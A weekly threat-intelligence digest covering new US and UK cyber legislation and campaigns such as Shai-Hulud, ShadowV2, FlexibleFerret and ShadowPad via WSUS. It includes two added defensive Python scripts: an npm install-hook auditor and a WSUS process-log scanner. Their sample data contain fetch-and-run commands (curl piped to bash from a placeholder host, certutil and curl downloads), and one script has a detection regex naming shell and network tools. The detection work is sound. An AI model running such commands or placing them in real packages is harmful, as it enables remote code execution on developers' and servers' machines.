Cyware Weekly Threat Intelligence, November 24–28, 2025

The Good
Governments are sharpening their legislative teeth this week, introducing aggressive new laws to combat the dual threats of AI-driven deception and crumbling cyber defenses. In the U.S., the new AI Fraud Deterrence Act proposes massive penalties for offenders who weaponize AI, including prison sentences of up to 30 years and fines reaching $2 million for utilizing fake audio or video in financial crimes. Across the Atlantic, the U.K. has introduced the Cyber Security and Resilience Bill to counter a 130% surge in significant cyber incidents, mandating tighter incident reporting windows.
A new bipartisan bill, the AI Fraud Deterrence Act, aims to combat the increasing use of AI in fraud and impersonation. The legislation proposes significant increases in criminal penalties for those using AI tools to create convincing fake audio, video, or text. Fines for various fraud types could rise to between $1 million and $2 million, with maximum prison sentences extending to 20 to 30 years for offenders. The bill specifically addresses the alarming trend of scammers impersonating government officials, with penalties of up to $1 million and three years in prison for such actions. This initiative responds to a series of high-profile incidents involving AI-generated impersonations that pose serious risks to both individuals and national security.
The UK Cyber Resilience Bill aims to enhance national security in response to a 130% rise in significant cyber incidents in 2025. Introduced in Parliament, the bill seeks to address gaps in existing regulations by expanding its regulatory scope to include data centers, managed service providers, and large load controllers. It mandates that operators of essential services report incidents within 24 hours and provide comprehensive reports within 72 hours, improving the current incident reporting framework. Additionally, the bill strengthens regulatory powers, allowing for targeted actions against national security threats and introducing higher penalties for non-compliance.
The Bad
The Bloody Wolf hacking group has intensified its campaigns in Kyrgyzstan and Uzbekistan, using spear-phishing to deliver the outdated but effective NetSupport RAT. RomCom has teamed up with the SocGholish cybercrime network to target a civil engineering firm using fake browser update alerts. This marks the first time RomCom's sophisticated Mythic Agent malware has been delivered through this common fake update infection route. A massive supply chain attack is turning trusted developer tools into weapons. The Shai-Hulud malware has compromised over 500 npm packages, including libraries for Zapier and PostHog.
Bloody Wolf, a hacking group, has intensified its cyberattack campaign in Kyrgyzstan and Uzbekistan since mid-2025, primarily targeting the finance, government, and IT sectors. Utilizing spear-phishing tactics, the group impersonates trusted government ministries to distribute malicious JAR files disguised as official documents. Once downloaded, these files execute a loader that fetches the NetSupport RAT payload, establishing persistence on the infected systems. Notably, the campaign in Uzbekistan incorporates geofencing, redirecting external requests to legitimate sites while delivering malware to local users. The attackers employ outdated tools, such as Java 8 and an older version of NetSupport Manager from 2013.
RomCom, a Russia-aligned malware group, has targeted a U.S.-based civil engineering company using SocGholish fake update attacks to deliver the Mythic Agent malware. This attack marks the first instance of RomCom payloads being distributed through SocGholish, which serves as an initial access broker by tricking users into downloading malicious JavaScript via fake browser update alerts. The threat actors behind SocGholish, linked to financially motivated groups, exploit vulnerabilities in compromised websites to initiate infections. In this case, the attack involved a rapid infection timeline of under 30 minutes, culminating in the establishment of a reverse shell and the deployment of a custom Python backdoor.
CISA issued a warning about ongoing spyware campaigns that target users of mobile messaging applications like Signal and WhatsApp. These campaigns utilize sophisticated social engineering techniques and exploit vulnerabilities to gain unauthorized access to user accounts. Notable examples include Russia-aligned threat actors hijacking Signal accounts through its linked devices feature, as well as Android spyware campaigns impersonating popular apps to deliver malware. Additionally, targeted attacks have exploited security flaws in iOS and Samsung devices to compromise fewer than 200 WhatsApp users. CISA emphasizes that these threats primarily focus on high-value individuals, including current and former government officials, military personnel, and civil society members across the U.S., the Middle East, and Europe.
Shai-Hulud malware has compromised over 500 npm packages in a recent supply-chain attack, targeting well-known tools like Zapier and PostHog to steal developer and CI/CD secrets. The malware modifies legitimate packages by injecting malicious scripts and publishes them on npm using compromised maintainer accounts. Researchers have identified around 350 unique accounts involved in this campaign, which has resulted in the automatic creation of thousands of repositories on GitHub, where stolen secrets are leaked. The malware employs advanced obfuscation techniques and includes destructive payloads that can overwrite a victim's home directory under certain conditions.
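As an added, defender-side example (not code from the report or from any of the vendors it names): a small Python audit that walks a node_modules tree and flags install-time lifecycle hooks in package.json, the kind of injected script the paragraph above describes. The hook names and the shell/network regex are heuristics chosen here, not indicators from the campaign; the sample package.json strings are constructed.

```python
"""Audit installed npm packages for install-time lifecycle hooks."""
import json
import os
import re

# Lifecycle hooks npm runs automatically during `npm install` (assumed set)
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic: hook commands that reach the network or spawn a shell (constructed list)
SUSPICIOUS = re.compile(
    r"\b(curl|wget|node\s+-e|eval|child_process|bash\s+-c|powershell)\b", re.I
)


def audit_package_json(text, name_hint="<unknown>"):
    """Return (package, hook, command, suspicious) for each install-time hook.

    Unparseable manifests are reported as a single flagged finding rather
    than silently skipped, since a broken package.json is itself worth a look.
    """
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError:
        return [(name_hint, "<invalid>", "", True)]
    name = pkg.get("name", name_hint)
    findings = []
    for hook, cmd in (pkg.get("scripts") or {}).items():
        if hook in INSTALL_HOOKS:
            findings.append((name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return findings


def audit_node_modules(root):
    """Walk a node_modules directory and collect findings from every package.json."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            path = os.path.join(dirpath, "package.json")
            with open(path, encoding="utf-8") as fh:
                findings.extend(audit_package_json(fh.read(), path))
    return findings


# Constructed sample manifests (not real packages)
CLEAN = '{"name": "demo-clean", "version": "1.0.0", "scripts": {"test": "jest"}}'
HOOKED = '{"name": "demo-hooked", "version": "2.3.4", "scripts": {"postinstall": "node setup.js"}}'
SHELLY = '{"name": "demo-shelly", "scripts": {"preinstall": "curl -s https://example.invalid/x | bash"}}'

if __name__ == "__main__":
    for sample in (CLEAN, HOOKED, SHELLY):
        for pkg, hook, cmd, flagged in audit_package_json(sample):
            print(f"{'!!' if flagged else '--'} {pkg}: {hook} -> {cmd}")
```

Any install-time hook deserves review, not only the flagged ones; the regex narrows the list, it does not clear a package.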
New Threats
A Mirai-based malware named ShadowV2 used the chaos of the recent AWS downtime to conduct a "test run" on vulnerable IoT devices. This opportunistic attack exploited known flaws in EoL devices to build a DDoS-capable botnet. A malware campaign dubbed FlexibleFerret is targeting macOS devices with a Go-based backdoor that mimics Chrome permission prompts to steal credentials. A new MaaS platform called Matrix Push C2 is using browser alerts to launch fileless phishing attacks across different operating systems. By mimicking legitimate system warnings or login alerts, attackers can trick users into clicking malicious links.
A new Mirai-based botnet malware, named ShadowV2, has emerged, targeting IoT devices from vendors like D-Link and TP-Link by exploiting known vulnerabilities. Observed during the significant AWS outage in October, ShadowV2 appeared to conduct test runs, leveraging at least eight vulnerabilities, including critical flaws in D-Link devices that will not receive fixes due to their end-of-life status. The attacks, originating from a specific IP address, affected various sectors globally, including government and education. ShadowV2 is delivered through a downloader script and supports DDoS attacks across multiple protocols. Its C2 infrastructure facilitates these attacks, although the identity of the perpetrators and their monetization strategy remain unknown.
A new malware campaign named FlexibleFerret has emerged, specifically targeting macOS systems. This sophisticated threat utilizes staged scripts and a persistent Go-based backdoor to bypass user safeguards and maintain long-term access to compromised devices. The malware employs a second-stage shell script that adapts its actions based on the system architecture, downloading various payloads accordingly. It masquerades as Chrome permission prompts to harvest user credentials, routing stolen data to a Dropbox account while avoiding detection through clever obfuscation techniques. The backdoor, known as CDrivers, facilitates numerous malicious tasks, including system information collection, file management, and automated credential theft.
Kimsuky has launched an advanced campaign utilizing dual variants of the KimJongRAT malware. This operation begins with phishing emails that impersonate South Korean agencies, delivering malicious LNK files and decoy PDFs to unsuspecting victims. The malware can dynamically switch between Portable Executable (PE) and PowerShell payloads based on the status of Windows Defender, enhancing its stealth. Once deployed, the malware conducts extensive data theft, including browser credentials, cryptocurrency wallet information, and system data. Additionally, Kimsuky has established phishing sites that mimic legitimate South Korean services, allowing them to capture login credentials without detection.
A recently discovered vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, has been actively exploited by threat actors to distribute ShadowPad malware. This modular backdoor, associated with Chinese state-sponsored hacking groups, allows attackers to gain full system access by executing remote code with system privileges. The exploitation process involves using legitimate Windows utilities like PowerCat, certutil, and curl to download and install ShadowPad after initially breaching the system. ShadowPad employs DLL side-loading techniques, leveraging a legitimate binary to execute malicious payloads while incorporating various anti-detection methods.
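As an added example of detection logic for the pattern described above (written here, not from the report): a Python scan over process-creation log lines that flags certutil, curl or PowerShell fetching a URL when the parent process belongs to WSUS. The log format, the WSUS parent process names (WsusService.exe and the IIS worker w3wp.exe) and the sample lines with their TEST-NET address are all constructed assumptions.

```python
"""Flag LOLBin downloads spawned from WSUS host processes in process-creation logs."""
import re
from collections import namedtuple

Event = namedtuple("Event", "parent image cmdline")

# Assumed WSUS host processes (not named in the report)
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
# Downloaders the report says were used to stage the second payload
DOWNLOADERS = {"certutil.exe", "curl.exe", "powershell.exe"}
URL = re.compile(r"https?://", re.I)


def parse_line(line):
    """Parse a constructed 'Key=Value|Key=Value' log line into an Event."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return Event(basename(fields["ParentImage"]), basename(fields["Image"]), fields["CommandLine"])


def is_suspicious(ev):
    """True when a WSUS process spawns a known downloader that references a URL."""
    if ev.parent not in WSUS_PARENTS or ev.image not in DOWNLOADERS:
        return False
    return bool(URL.search(ev.cmdline)) or "-urlcache" in ev.cmdline.lower()


def scan(lines):
    """Return the suspicious Events found in an iterable of log lines."""
    return [ev for ev in map(parse_line, lines) if is_suspicious(ev)]


# Constructed sample log; 198.51.100.7 is a documentation (TEST-NET-2) address
SAMPLE_LOG = [
    "ParentImage=C:\\Program Files\\Update Services\\Service\\WsusService.exe|Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f http://198.51.100.7/x.txt C:\\Windows\\Temp\\x.txt",
    "ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe|Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl -o C:\\Windows\\Temp\\a.dll http://198.51.100.7/a.dll",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\curl.exe|CommandLine=curl https://example.org/",
    "ParentImage=C:\\Program Files\\Update Services\\Service\\WsusService.exe|Image=C:\\Windows\\System32\\conhost.exe|CommandLine=conhost.exe 0x4",
]

if __name__ == "__main__":
    for ev in scan(SAMPLE_LOG):
        print(f"ALERT parent={ev.parent} image={ev.image} cmd={ev.cmdline}")
```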
Matrix Push C2 is a new C2 platform that utilizes browser notifications for fileless, cross-platform phishing attacks. By tricking users into allowing notifications through social engineering tactics, attackers can send alerts that appear to originate from the operating system or browser. These notifications often mimic legitimate messages, such as suspicious login alerts, leading victims to click on malicious links. This innovative approach bypasses traditional security measures, creating a persistent communication channel with victims across various platforms. Offered as a malware-as-a-service, Matrix Push C2 is sold through crimeware channels, allowing attackers to customize their phishing campaigns with templates that impersonate well-known brands. Additionally, the platform provides tools for tracking victim interactions and analyzing the effectiveness of their attacks.